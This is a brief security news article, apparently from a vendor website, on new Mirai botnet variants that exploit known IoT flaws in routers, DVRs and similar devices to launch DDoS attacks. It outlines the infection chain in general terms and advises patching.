HQ/EMEAFind out how we can help your business
A new cybercriminal campaign that started earlier this year propagates a new Mirai botnet variant by exploiting multiple IoT vulnerabilities. According to researchers, the campaign operators leverage the vulnerabilities to obtain control over the targeted devices to execute further cybercriminal operations, like Distributed Denial-of-Service (DDoS) attacks.
Based on reports, researchers identified two new Mirai botnet variants in an ongoing operation that started last March and surged in April and this month. These botnet variants target about 22 known security issues in several connected products, such as DVRs, WiFi communication dongles, NVRs, thermal monitoring systems, routers, solar power generation monitors, and access control systems.
Some confirmed products these botnets affected came from well-known providers, such as TP-Link, Zyxel, D-Link, Arris, Nagios, SolarView, Tenda, MediaTek, and Nortek.
The Mirai botnet variants could start their infection process by exploiting a flaw that could lay the path for running a shell script.
The attack chain of these Mirai botnet variants begins by abusing one of the known IoT vulnerabilities. The flaw could lay the groundwork for the botnet to execute a shell script from an external resource.
Subsequently, the script downloads the botnet clients that correspond to the architectures of an infected machine, like arm6l, arm7l, mips, i686, i586, arm5l, mipsel, sh4, x86_64, arc, m68k, armv4l, and sparc.
The shell script downloader also deletes the client’s file infection tracks to mitigate the chances of detection after the execution of the bot client.
Numerous Mirai botnet versions have appeared in the wild for several months. Earlier this year, a researcher noticed active exploitation of a command injection flaw in Zyxel gear by a botnet inspired by Mirai.
A Mirai botnet in February called V3G4 exploited about 13 flaws in three different attacks to launch widespread DDoS campaigns.
The exploit of IoT devices has remained prevalent for the past months since new botnet variants continue to emerge. Therefore, organisations should take precautionary measures and apply the latest security patches to protect their devices from attacks caused by Mirai-inspired botnet malware variants.
